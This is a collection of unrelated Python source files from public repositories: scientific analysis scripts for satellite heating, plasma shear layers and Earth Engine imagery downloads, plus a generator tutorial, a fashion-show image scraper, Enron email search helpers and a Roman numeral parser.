(As[k] * ((C_aek4 * C_aik4) / (np.pi * np.linalg.norm(Rhok4) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad4 = Hrad4 + (As[k] * ((C_aek4 * C_aik4) / (np.pi * np.linalg.norm(Rhok4) ** 2)) * Balb)\n\n if np.dot(Rhok5, Terra[k]) > 0:\n\n C_aek5 = np.dot(Rhok5, Terra[k]) / (np.linalg.norm(Rhok5) * np.linalg.norm(Terra[k]))\n C_aik5 = (np.dot(-Rhok5, A5)) / (np.linalg.norm(Rhok5) * np.linalg.norm(A5))\n\n if C_aik5 > 0 and C_aek5 > 0:\n\n Balb = float(1.0)\n\n Hrad5 = Hrad5 + (As[k] * ((C_aek5 * C_aik5) / (np.pi * np.linalg.norm(Rhok5) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad5 = Hrad5 + (As[k] * ((C_aek5 * C_aik5) / (np.pi * np.linalg.norm(Rhok5) ** 2)) * Balb)\n\n if np.dot(Rhok6, Terra[k]) > 0:\n\n C_aek6 = np.dot(Rhok6, Terra[k]) / (np.linalg.norm(Rhok6) * np.linalg.norm(Terra[k]))\n C_aik6 = (np.dot(-Rhok6, A6)) / (np.linalg.norm(Rhok6) * np.linalg.norm(A6))\n\n if C_aik6 > 0 and C_aek6 > 0:\n\n Balb = float(1.0)\n\n Hrad6 = Hrad6 + (As[k] * ((C_aek6 * C_aik6) / (np.pi * np.linalg.norm(Rhok6) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad6 = Hrad6 + (As[k] * ((C_aek6 * C_aik6) / (np.pi * np.linalg.norm(Rhok6) ** 2)) * Balb)\n\n R1.append(Hrad1)\n Qrad1.append(e * Ir * (Hrad1))\n Hrad1 = 0\n\n R2.append(Hrad2)\n Qrad2.append(e * Ir * (Hrad2))\n Hrad2 = 0\n\n R3.append(Hrad3)\n Qrad3.append(e * Ir * (Hrad3))\n Hrad3 = 0\n\n R4.append(Hrad4)\n Qrad4.append(e * Ir * (Hrad4))\n Hrad4 = 0\n\n R5.append(Hrad5)\n Qrad5.append(e * Ir * (Hrad5))\n Hrad5 = 0\n\n R6.append(Hrad6)\n Qrad6.append(e * Ir * (Hrad6))\n Hrad6 = 0\n\nQt1 = []\nQt2 = []\nQt3 = []\nQt4 = []\nQt5 = []\nQt6 = []\n\nfor i in range(0, len(Qalb1), 1):\n Qt1.append(Qalb1[i] + Qs1[i] + Qrad1[i])\n Qt2.append(Qalb2[i] + Qs2[i] + Qrad2[i])\n Qt3.append(Qalb3[i] + Qs3[i] + Qrad3[i])\n Qt4.append(Qalb4[i] + Qs4[i] + Qrad4[i])\n Qt5.append(Qalb5[i] + Qs5[i] + Qrad5[i])\n Qt6.append(Qalb6[i] + Qs6[i] + Qrad6[i])\n\nfig = plt.figure()\nplt.xlabel(\"Ponto da orbita\")\nplt.ylabel(\"Calor incidente em cada face [W/m^2]\")\nplt.plot(T, Qt1, color='green', label='N1')\nplt.plot(T, Qt2, color='blue', label='N2')\nplt.plot(T, Qt3, color='cyan', label='N3')\nplt.plot(T, Qt4, 
color='yellow', label='N4')\nplt.plot(T, Qt5, color='red', label='N5')\nplt.plot(T, Qt6, color='magenta', label='N6')\nplt.legend()\nplt.show()\n","repo_name":"RodsCardozo/Lars-Software","sub_path":"calor_incidente.py","file_name":"calor_incidente.py","file_ext":"py","file_size_in_byte":16910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3470743688","text":"'https://realpython.com/introduction-to-python-generators/'\n\n'''\nWhen you call a generator function or use a generator expression, you return a special iterator called a generator. \nYou can assign this generator to a variable in order to use it. \nWhen you call special methods on the generator, such as next(), the code within the function is executed up to yield.\n\nWhen the Python yield statement is hit, the program suspends function execution and returns the yielded value to the caller. \n(In contrast, return stops function execution completely.) When a function is suspended, the state of that function is saved.\n'''\n\nmy_list = [1, 2, 3, 4, 5]\n\ndef my_generator():\n for item in my_list:\n yield item\n\nresult = my_generator()\n\nprint(next(result))\nprint(next(result))\nprint(next(result))","repo_name":"H0r4c3/Python_00_ALL","sub_path":"Generators/generators2.py","file_name":"generators2.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"26001298496","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\nfrom PIL import Image\nfrom io import BytesIO\nimport os\nfrom unidecode import unidecode\n\n\n##### Takes in a designer (string) and returns all the shows (list) ##########################################\ndef designer_to_shows(designer):\n # Replace spaces, puncuations, special character, etc. with - and make lowercase\n designer = designer.replace(' ','-').replace('.','-').replace('&','').replace('+','').replace('--','-').lower()\n designer = unidecode(designer)\n\n # Designer URL\n URL = \"https://www.vogue.com/fashion-shows/designer/\" + designer\n\n # Make request\n r = requests.get(URL)\n\n # Soupify\n soup = BeautifulSoup(r.content, 'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib\n\n # Load a dict of the json file with the relevent data\n js = str(soup.find_all('script', type='text/javascript')[3])\n js = js.split(' = ')[1]\n js = js.split(';<')[0]\n data = json.loads(js)\n\n # Find the show data within the json\n try:\n t = data['transformed']\n d = t['runwayDesignerContent']\n designer_collections = d['designerCollections']\n except:\n print('could not find shows')\n return []\n\n # Go through each show and add to list\n shows = []\n for show in designer_collections:\n shows.append(show['hed'])\n\n return shows\n####################################################################################################\n\n\n##### Takes in a designer (string) and show (string) and then downloads images to save path (string) ####################\ndef designer_show_to_download_images(designer, show, save_path):\n # Replace spaces with - and lowercase\n show = show.replace(' ','-').lower()\n show = unidecode(show)\n\n # Replace spaces, puncuations, special character, etc. 
with - and make lowercase\n designer = designer.replace(' ','-').replace('.','-').replace('&','').replace('+','').replace('--','-').lower()\n designer = unidecode(designer)\n\n # Check to see if images are already downloaded\n if(os.path.exists(save_path + '/' + designer+ '/' + show)):\n print('Photos already downloaded')\n return None\n\n # URL of the show\n url = \"https://www.vogue.com/fashion-shows/\" + show + '/' + designer\n\n # Make request\n r = requests.get(url)\n\n # Soupify\n soup = BeautifulSoup(r.content, 'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib\n\n # Load a dict of the json file with the relevent data\n try:\n js = str(soup.find_all('script', type='text/javascript')[3])\n js = js.split(' = ')[1]\n js = js.split('; tags.'''\n fields = ['_X-From', '_X-To', '_body']\n if len(result['_source']['_Subject']) == 0:\n result['_source']['_Subject'] = 'N/A'\n for field in fields:\n result['_source'][field] = re.sub(r\"@ENRON\", \"\", result['_source'][field])\n result['_source'][field] = re.sub(r\"<(.*?)>\", \"\", result['_source'][field]).strip()\n if len(result['_source'][field]) > 50:\n result['_source'][field] = result['_source'][field][:50]+'...'\n return result\n\n\nasync def es_search(es, query):\n print('posting....')\n body = {\n \"size\" : 1000,\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"multi_match\": {\n \"query\": query,\n \"fields\": [\"_From\", \"_To\", \"_Subject\", \"_body\"],\n \"fuzziness\" : \"AUTO\",\n \"prefix_length\" : 2\n\n }\n }\n }\n },\n \n }\n\n try:\n results = await es.search(\n index='enron', body=body\n )\n\n if len(results) == 0:\n return \"Nothing found.\"\n \n total = results['hits']['total']['value']\n print(f'Total results: {total}')\n \n results = results['hits']['hits']\n results = list(map(clean_address, results))\n \n print(results[:2])\n except Exception as e:\n print('Error: ', e)\n \n fields = {'_Date':'Date', '_X-From':'From', '_X-To':'To', '_Subject': 'Subject', '_score':'Score'}\n\n return results, total","repo_name":"mcgowaji/records-mgmt","sub_path":"app/library/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30004300947","text":"\nfrom itertools import zip_longest\ndef parse_roman_numeral(txt):\n d = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n neg_combo = [('I', 'VX'), ('X', 'LC'), ('C', 'DM')]\n res = 0\n for i, j in zip_longest(txt, txt[1:]):\n for x in [x for x in neg_combo]:\n if i in x[0] and j and j in x[1]:\n res += d[j] - d[i]\n res -= d[j] \n break \n else:\n res += d[i] \n return res\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"oepiudBYC7PT7TXAM_22.py","file_name":"oepiudBYC7PT7TXAM_22.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39536466682","text":"import Rappture\nimport sys\n\n# uncomment these for debugging\n# sys.stdout = open('enc.out', 'w')\n# sys.stderr = open('enc.err', 'w')\n\n# open the XML file containing the run parameters\nrx = Rappture.PyXml(sys.argv[1])\n\nmodel = rx['input.(model).current'].value\n\nif model == 'dd':\n result = \"Drift-Diffusion:\\n\"\n recomb = rx['input.(dd).(recomb).current'].value\n result += \" Recombination model: %s\\n\" % recomb\n if recomb:\n taun = rx['input.(dd).(taun).current'].value\n taup = 
rx['input.(dd).(taup).current'].value\n result += \" TauN: %s\\n\" % taun\n result += \" TauP: %s\\n\" % taup\nelif model == 'bte':\n result = \"Boltzmann Transport Equation:\\n\"\n temp = rx[\"input.(bte).(temp).current\"].value\n result += \" Temperature: %s\\n\" % temp\n secret = rx['input.(bte).(secret).current'].value\n result += \" Hidden number: %s\\n\" % secret\nelif model == 'negf':\n result = \"NEGF Analysis:\\n\"\n tbe = rx['input.(negf).(tbe).current'].value\n result += \" Tight-binding energy: %s\\n\" % tbe\n tau = rx['input.(negf).(tau).current'].value\n result += \" High-energy lifetime: %s\\n\" % tau\n\nrx['output.log'] = result\n\n# save the updated XML describing the run...\nrx.close()\n","repo_name":"AenBleidd/rappture","sub_path":"examples/zoo/enable/enable.py","file_name":"enable.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8452273899","text":"# coding:utf-8\nimport argparse\nimport csv\nimport math\nfrom multiprocessing.dummy import Pool, Lock\nimport os\nimport datetime as DATETIME\nimport random\nimport geemap\n# datetime.strptime(str(a),\"%Y%m%d\")\nimport warnings\n\nwarnings.simplefilter('ignore', UserWarning)\nimport ee\nimport numpy as np\nimport urllib3\n\nALL_BANDS = ['B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B8A', 'B9', 'B11', 'B12']\nRGB_BANDS = ['B4', 'B3', 'B2']\nRGB_BANDS_NIR = ['B4', 'B3', 'B2', 'B8']\ndates = [2016,\n 2017,\n 2018,\n 2019,\n 2020,\n 2021]\n\n\nclass UniformSampler:\n\n def sample_point(self):\n lon = np.random.uniform(-180, 180)\n lat = np.random.uniform(-90, 90)\n return [lon, lat]\n\n\ndef read_csv(file):\n points = []\n with open(file, encoding=\"unicode_escape\") as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n lon = row[4]\n lat = row[5]\n if lon == \"x\":\n continue\n points.append([float(lon), float(lat)])\n return points\n\n\nclass GaussianSampler:\n\n def __init__(self, interest_points=None, std=150, size=None):\n self.interest_points = interest_points\n self.std = std\n self.size = size\n self.count = 0\n\n def initialize_point(self):\n center_point = self.interest_points[self.count]\n self.count += 1\n return center_point\n\n def sample_one_point(self, center_point):\n std = self.km2deg(self.std)\n lon, lat = np.random.normal(loc=center_point, scale=[std, std]) # Gaussian Sample\n # lon, lat = self.getRandomPointInCircle(radius=std, centerx=center_point[0],\n # centery=center_point[1]) # Circle sample\n return [lon, lat]\n\n @staticmethod\n def km2deg(kms, radius=6371):\n return kms / (2.0 * radius * np.pi / 360.0)\n\n @staticmethod\n def getRandomPointInCircle(radius, centerx, centery):\n theta = random.random() * 2 * np.pi\n r = random.uniform(0, radius ** 2)\n x = math.cos(theta) * (r ** 0.5) + centerx\n y = math.sin(theta) * (r ** 0.5) + centery\n\n return x, y\n\n\ndef downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, cloud_pct, debug=False):\n coord = sampler.sample_one_point(center_coord)\n periods = get_period(dates)\n # We use the size of 64*64 samples for training, so the radius of the buffer is 320 meters (10 meters resolution)\n loc = ee.Geometry.Point(coord).buffer(320).bounds()\n try:\n for period in periods:\n s2_collection = (\n ee.ImageCollection('COPERNICUS/S2')\n .filterBounds(loc)\n .filterDate(period[0], period[1])\n .filter(ee.Filter.lt('CLOUDY_PIXEL_PERCENTAGE', cloud_pct))\n .map(maskS2clouds)\n )\n dynamicWorld_collection = 
ee.ImageCollection(\"GOOGLE/DYNAMICWORLD/V1\"). \\\n filterDate(period[0], period[1]). \\\n filterBounds(loc)\n s2_image = s2_collection.median().select(['B2', 'B3', 'B4', \"B8\"]).clip(loc).divide(10000.0)\n dynamicWorld_image = dynamicWorld_collection.median().select([\"built\"]).clip(loc)\n geemap.download_ee_image(s2_image, f\"{sub_location_path}/{period[0].split('-')[0]}_s2.tif\", scale=10,\n region=loc,\n crs=\"EPSG:4326\") # EPSG:4326 is WGS84\n geemap.download_ee_image(dynamicWorld_image,\n f\"{sub_location_path}/{period[0].split('-')[0]}_dynamicWorld.tif\", scale=10,\n region=loc,\n crs=\"EPSG:4326\")\n # Sometimes the network is disconnected (more noticeable in mainland China), so it needs to be re-run\n except (ee.EEException, urllib3.exceptions.HTTPError) as e:\n if debug:\n print(e)\n downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, cloud_pct, debug=debug)\n\n\ndef maskS2clouds(image):\n qa = image.select('QA60')\n\n # Bits 10 and 11 are clouds and cirrus, respectively.\n cloudBitMask = 1 << 10\n cirrusBitMask = 1 << 11\n\n # Both flags should be set to zero, indicating clear conditions.\n mask = qa.bitwiseAnd(cloudBitMask).eq(0)\n mask = mask.bitwiseAnd(cirrusBitMask).eq(0)\n\n return image.updateMask(mask)\n\ndef get_period(dates):\n year1, year2, year3 = random.sample(dates, 3)\n time1_0 = DATETIME.date(year1, 1, 1)\n time1_1 = DATETIME.date(year1, 12, 30)\n time2_0 = DATETIME.date(year2, 1, 1)\n time2_1 = DATETIME.date(year2, 12, 30)\n time3_0 = DATETIME.date(year3, 1, 1)\n time3_1 = DATETIME.date(year3, 12, 30)\n return [(time1_0.isoformat(), time1_1.isoformat()), (time2_0.isoformat(), time2_1.isoformat()),\n (time3_0.isoformat(), time3_1.isoformat())]\n\n\nif __name__ == '__main__':\n # For users in mainland China, they need to use a VPN and configure a proxy here, because google services are not\n # accessible in China\n # os.environ['HTTP_PROXY'] = 'http://127.0.0.1:7890'\n # os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:7890'\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--save_path', type=str, default=r\"D:\\try\", help=\"Save path\")\n parser.add_argument('--num_workers', type=int, default=16, help=\"Number of workers for multiprocessing\")\n parser.add_argument('--sample_points', type=int, default=200,\n help=\"Number of sampling points around the base point \")\n parser.add_argument('--cloud_pct', type=int, default=10)\n parser.add_argument('--debug', default=False)\n args = parser.parse_args()\n\n ee.Authenticate()\n ee.Initialize()\n # A file containing coordinates of more than 2,\n # 000 administrative units in China to provide basic sampling information. 
If you want to sample in other\n # countries, you can prepare a similar document\n points = read_csv(r\"./county_locations.csv\")\n n = args.sample_points\n # Use Gaussian sampling to keep data concentrated in urban areas as much as possible\n sampler = GaussianSampler(interest_points=points)\n\n\n def worker(idx):\n idx = idx\n try:\n center_coord = sampler.initialize_point()\n except Exception as e: # Sampling overruns\n print(e)\n return\n for loc_id in range(n):\n if args.save_path is not None:\n location_path = os.path.join(args.save_path, f'{idx:06d}')\n os.makedirs(location_path, exist_ok=True)\n sub_location_path = os.path.join(location_path, str(loc_id))\n os.makedirs(sub_location_path, exist_ok=True)\n downloadS2andDynamicWorld(sampler, dates, center_coord, sub_location_path, args.cloud_pct, args.debug)\n return\n\n\n indices = range(len(points))\n\n if args.num_workers == 0:\n for i in indices:\n worker(i)\n else:\n with Pool(processes=args.num_workers) as p:\n p.map(worker, indices)\n","repo_name":"zpl99/STSR-Seg","sub_path":"Download/s2andDynamicWorld_download.py","file_name":"s2andDynamicWorld_download.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"71063929051","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 14 12:39:01 2022\n\n@author: mlampert\n\"\"\"\n\nimport pandas\nimport copy\n\nimport os\nimport flap\nimport flap_nstx\nimport numpy as np\nimport scipy\n\nfrom flap_nstx.gpi import nstx_gpi_velocity_analysis_spatio_temporal_displacement\nfrom flap_nstx.analysis import read_gpi_results, read_thomson_results\nfrom flap_nstx.tools import calculate_corr_acceptance_levels\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.ticker import MaxNLocator\n\nthisdir = os.path.dirname(os.path.realpath(__file__))\nfn = os.path.join(thisdir,\"../flap_nstx.cfg\")\nflap.config.read(file_name=fn)\nflap_nstx.register()\nwd=flap.config.get_all_section('Module NSTX_GPI')['Working directory']\n\ndef calculate_shear_layer_vpol(elm_time_range=200e-6, #Time range the shear layer calculated in (actually [t_elm-t-25us,t_elm-25us])\n elm_time_adjust=25e-6, #Leave this time out from the averaging for the profile estimation\n shear_calc_t_elm_range=[-5e-3,0e-6], #Available as of 03/22/2022: [-200e-6,0] and [-500e-6,200e-6]\n shear_avg_t_elm_range=[-5e-3,-200e-6], #Average time range for the shear layer calculations\n # should be in between shear_calc_t_elm_range+{+fbin*samplingtime,-fbin*sampling_time} \n sg_filter_order=11, #Scholasky-Golay filter order\n fbin=10, #+-binning average for the poloidal velocity calculation\n sampling_time=2.5e-6,\n\n plot_shear_profile=False, #Plot each shear layer profile and v'pol\n shot_to_plot=None, #Plot the rotation profile of the shot or shot list\n \n \n nocalc=True, #Recalculate the velocity results\n verbose=False,\n test=False,\n return_results=True,\n save_data_for_publication=False,\n ):\n \n spatial_resolution=0.00375 #m/pix\n \n database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'\n db=pandas.read_csv(database_file, index_col=0)\n elm_index=list(db.index)\n elm=0.\n if save_data_for_publication:\n raise NotImplementedError('Do your job already!!!')\n \n if plot_shear_profile:\n pdf_pages=PdfPages(wd+'/plots/edge_shear_profiles.pdf')\n import matplotlib\n matplotlib.use('agg')\n \n data_dict={'data':[],\n 
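# 'data'/'error' collect one radial profile per ELM event (appended\r\n               # in the per-ELM loop below); 'unit' and 'label' are static strings\r\n               # used only for plot annotation.\r\n               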
'error':[],\n 'unit':'',\n 'label':'',\n }\n \n quantity_dict={'v_pol':copy.deepcopy(data_dict),\n 'v_pol_prime':copy.deepcopy(data_dict),\n 'v_pol_prime_prime':copy.deepcopy(data_dict),\n \n 'v_pol_smooth':copy.deepcopy(data_dict),\n 'v_pol_prime_smooth':copy.deepcopy(data_dict),\n 'v_pol_prime_prime_smooth':copy.deepcopy(data_dict),\n }\n \n coordinate_dict={'name':None,\n 'label':None,\n 'values':None,\n 'unit':None,\n 'index':None,\n }\n \n shear_data={'data':copy.deepcopy(quantity_dict),\n 'derived':{},\n 'coord':{},\n 'shot':[],\n 'elm_time':[],\n 'code':'flap_nstx.analysis.calculate_shear_layer_vpol'\n }\n \n shear_data['data']['v_pol']['unit']='m/s'\n shear_data['data']['v_pol']['label']='$v_{pol}$'\n \n shear_data['data']['v_pol_prime']['unit']='rad/s'\n shear_data['data']['v_pol_prime']['label']='$v\\'_{pol}$'\n \n shear_data['data']['v_pol_prime_prime']['unit']='$m^{-1}s^{-1}$'\n shear_data['data']['v_pol_prime_prime']['label']='$v\\'\\'_{pol}$'\n \n \n shear_data['data']['v_pol_smooth']['unit']='m/s'\n shear_data['data']['v_pol_smooth']['label']='$v_{pol,SG}$'\n \n shear_data['data']['v_pol_prime_smooth']['unit']='rad/s'\n shear_data['data']['v_pol_prime_smooth']['label']='$v\\'_{pol,SG}$'\n \n shear_data['data']['v_pol_prime_prime_smooth']['unit']='$m^{-1}s^{-1}$'\n shear_data['data']['v_pol_prime_prime_smooth']['label']='$v\\'\\'_{pol,SG}$'\n \n shear_data['derived']['Separatrix radius']={}\n shear_data['derived']['Separatrix radius']['data']=[]\n shear_data['derived']['Separatrix radius']['unit']='m'\n shear_data['derived']['Separatrix radius']['label']='$R_{sep}$'\n \n shear_data['coord']['r']=copy.deepcopy(coordinate_dict)\n \n shear_data['coord']['r']['name']='Radial'\n shear_data['coord']['r']['label']='R'\n shear_data['coord']['r']['unit']='m'\n shear_data['coord']['r']['index']=1\n \n # shear_data['coord']['psin']=copy.deepcopy(coordinate_dict)\n \n # shear_data['coord']['psin']['name']='Normalized flux'\n # shear_data['coord']['psin']['label']='$\\Psi_{n}$'\n # shear_data['coord']['psin']['unit']=''\n # shear_data['coord']['psin']['index']=1\n \n \n for index_elm in range(len(elm_index)):\n #preprocess velocity results, tackle with np.nan and outliers\n shot=int(db.loc[elm_index[index_elm]]['Shot'])\n #define ELM time for all the cases\n elm_time=db.loc[elm_index[index_elm]]['ELM time']/1e3\n \n flap.delete_data_object('*')\n if verbose: print('Calculating '+str(shot)+ ' at '+str(elm_time*1e3)+'ms')\n elm=elm+1\n time_range=list(elm_time+np.asarray(shear_calc_t_elm_range))\n result=nstx_gpi_velocity_analysis_spatio_temporal_displacement(exp_id=shot, \n time_range=time_range, \n x_search=5,\n y_search=5,\n x_range=[5,49], \n y_range=[35,45], \n plot=False, \n pdf=False, \n nocalc=nocalc,\n return_results=True,\n fbin=fbin,\n )\n \n # if n_timewin is None:\n # n_timewin=int(elm_time_range/sampling_time)-2*fbin-int(elm_time_adjust/sampling_time)\n # shear_calc_t_elm_range+[fbin]\n ind_range=np.where(np.logical_and(result['Time'] > elm_time+shear_avg_t_elm_range[0],\n result['Time'] < elm_time+shear_avg_t_elm_range[1]))\n \n vpol_rad=np.mean(result['Poloidal velocity'][:,:,ind_range[0]],axis=(1,2)) #Weird bug, but [0] fixes it.\n vpol_rad_error=np.sqrt(np.var(result['Poloidal velocity'][:,:,ind_range[0]],axis=(1,2)))\n if test:\n print('vpol_rad_error/vpol_rad',\n vpol_rad_error/vpol_rad)\n \n vpol_prime=np.gradient(vpol_rad)/spatial_resolution\n vpol_prime_error=list((vpol_rad_error[0:-2]+vpol_rad_error[2:])/2)\n vpol_prime_error.insert(0,vpol_rad_error[0])\n 
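# Error propagation for the centered-difference gradient above: interior\r\n        # points take the arithmetic mean of the two neighbouring errors, and this\r\n        # insert/append pair copies the boundary errors to the endpoints. For\r\n        # y' = (y[i+1]-y[i-1])/(2*dx), strict Gaussian propagation would give\r\n        # sqrt(e[i+1]**2 + e[i-1]**2)/(2*dx); the arithmetic mean is always >=\r\n        # that, so the quoted errors are mildly conservative.\r\n        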
vpol_prime_error.append(vpol_rad_error[-1])\n vpol_prime_error=np.asarray(vpol_prime_error)\n vpol_prime_error /= spatial_resolution\n if test:\n print('vpol_prime_error/vpol_prime',\n vpol_prime_error/vpol_prime)\n \n vpol_prime_prime=np.gradient(vpol_prime)/spatial_resolution\n vpol_prime_prime_error=list((vpol_prime_error[0:-2]+vpol_prime_error[2:])/2)\n vpol_prime_prime_error.insert(0,vpol_prime_error[0])\n vpol_prime_prime_error.append(vpol_prime_error[-1])\n vpol_prime_prime_error=np.asarray(vpol_prime_prime_error)\n vpol_prime_prime_error /= spatial_resolution\n if test:\n print('vpol_prime_prime_error/vpol_prime_prime',\n vpol_prime_prime_error/vpol_prime_prime)\n if index_elm == 0:\n shear_data['coord']['r']['values']=result['Image x']*spatial_resolution+1.402 #1.402 is the spatial offset of the innermost pixel of the GPI\n \n vpol_rad_smooth = scipy.signal.savgol_filter(vpol_rad, sg_filter_order, sg_filter_order//2)\n vpol_rad_smooth_error = scipy.signal.savgol_filter(vpol_rad_error, sg_filter_order, sg_filter_order//2)\n \n vpol_prime_smooth = scipy.signal.savgol_filter(vpol_prime, sg_filter_order, sg_filter_order//2)\n vpol_prime_smooth_error = scipy.signal.savgol_filter(vpol_prime_error, sg_filter_order, sg_filter_order//2)\n \n vpol_prime_prime_smooth = scipy.signal.savgol_filter(vpol_prime_prime, sg_filter_order, sg_filter_order//2)\n vpol_prime_prime_smooth_error = scipy.signal.savgol_filter(vpol_prime_prime_error, sg_filter_order, sg_filter_order//2)\n \n shear_data['data']['v_pol']['data'].append(vpol_rad)\n shear_data['data']['v_pol']['error'].append(vpol_rad_error)\n \n shear_data['data']['v_pol_prime']['data'].append(vpol_prime)\n shear_data['data']['v_pol_prime']['error'].append(vpol_prime_error)\n \n shear_data['data']['v_pol_prime_prime']['data'].append(vpol_prime_prime)\n shear_data['data']['v_pol_prime_prime']['error'].append(vpol_prime_prime_error)\n \n shear_data['data']['v_pol_smooth']['data'].append(vpol_rad_smooth)\n shear_data['data']['v_pol_smooth']['error'].append(vpol_rad_smooth_error)\n \n shear_data['data']['v_pol_prime_smooth']['data'].append(vpol_prime_smooth)\n shear_data['data']['v_pol_prime_smooth']['error'].append(vpol_prime_smooth_error)\n \n shear_data['data']['v_pol_prime_prime_smooth']['data'].append(vpol_prime_prime_smooth)\n shear_data['data']['v_pol_prime_prime_smooth']['error'].append(vpol_prime_prime_smooth_error)\n \n shear_data['shot'].append(shot)\n shear_data['elm_time'].append(elm_time)\n try:\n R_sep=flap.get_data('NSTX_MDSPlus',\n name='\\EFIT02::\\RBDRY',\n exp_id=shot,\n object_name='SEP R OBJ').slice_data(slicing={'Time':elm_time}).data\n except:\n R_sep=np.nan\n \n shear_data['derived']['Separatrix radius']['data'].append(np.max(R_sep))\n \n if plot_shear_profile:\n if (shot_to_plot is None or \n shot in np.asarray(shot_to_plot)):\n \n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/np.sqrt(2)/2.54))\n ax.plot(shear_data['coord']['r']['values'],\n vpol_rad_smooth/1e3,\n label='$v_{pol}$')\n ax.set_xlabel('R [m]')\n #ax.set_ylabel('$\\partial v_{pol}/\\partial x$ (1/s)')\n ax.set_ylabel('$v_{pol}$ [km/s]')\n ax.set_title('$v_{pol}$ vs. 
R for #'+str(shot)+' @ '+str(int(elm_time*1e3))+'ms')\n ax.xaxis.set_major_locator(MaxNLocator(5)) \n ax.yaxis.set_major_locator(MaxNLocator(5))\n \n ax2=ax.twinx()\n ax2.set_ylabel('$\\partial v_{pol}/\\partial x$ [$10^{3}$/s]')\n \n ax2.plot(shear_data['coord']['r']['values'],\n vpol_prime_smooth/1e3,\n color='orange',\n label='$v\\'_{pol}$')\n ax2.set_ylim(-np.max(np.abs(vpol_prime_smooth/1e3)),\n np.max(np.abs(vpol_prime_smooth/1e3)))\n ax2.yaxis.set_major_locator(MaxNLocator(5))\n \n\n plt.axvline(np.max(R_sep),\n color='green')\n \n plt.tight_layout(pad=0.1)\n pdf_pages.savefig()\n \n for key in shear_data['data'].keys():\n shear_data['data'][key]['data']=np.asarray(shear_data['data'][key]['data'])\n shear_data['data'][key]['error']=np.asarray(shear_data['data'][key]['error'])\n \n if plot_shear_profile:\n pdf_pages.close()\n matplotlib.use('qt5agg')\n \n if return_results:\n return shear_data\n\n \ndef analyze_shear_filament_dependence(elm_window=400e-6,\n elm_duration=100e-6,\n recalc=False\n ):\n \n pdf_pages=PdfPages(wd+'/plots/shear_max_vs_maximum_angular_velocity.pdf')\n \n gpi_results=read_gpi_results(elm_window=elm_window,\n elm_duration=elm_duration,\n correlation_threshold=0.7,\n transformation=None, #['log','power','exp','diff',]\n transformation_power=None,\n recalc_gpi=recalc,)\n angular_velocity=gpi_results['data']['Angular velocity ccf FLAP log']['data']\n \n thomson_results=read_thomson_results(thomson_time_window=20e-3,\n flux_range=[0.65,1.1],\n recalc_thomson=recalc)\n \n shear_results=calculate_shear_layer_vpol(nocalc=not recalc,\n n_timewin=60,\n sg_filter_order=21)\n max_vpol_shear=[]\n for elm_ind in range(len(thomson_results['Mate']['elm_time'])):\n # max_position=thomson_results['Mate']['data']['Pressure']['position_r']['value'][elm_ind]\n # #ind_search_max=np.where(shear_results['coord']['r']['values'] > max_position)\n try:\n max_vpol_shear.append(np.min(shear_results['data']['v_pol_prime_smooth']['data'][elm_ind,:]))\n except:\n max_vpol_shear.append(np.nan)\n max_vpol_shear=np.asarray(max_vpol_shear)\n \n max_angular_velocity=[]\n for ind in range(angular_velocity.shape[0]):\n ind_notnan=np.logical_not(np.isnan(angular_velocity[ind,:]))\n max_ang_vel=np.max(angular_velocity[ind,:][ind_notnan])\n max_angular_velocity.append(max_ang_vel)\n \n max_angular_velocity=np.asarray(max_angular_velocity)\n \n ind_not_nan=np.where(np.logical_not(np.logical_or(np.isnan(max_vpol_shear),np.isnan(max_angular_velocity))))\n \n max_angular_velocity=max_angular_velocity[ind_not_nan]\n max_vpol_shear=max_vpol_shear[ind_not_nan]\n \n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n \n ax.scatter(max_vpol_shear,\n max_angular_velocity/1e3,\n s=2)\n \n ax.set_title('Velocity shear vs. 
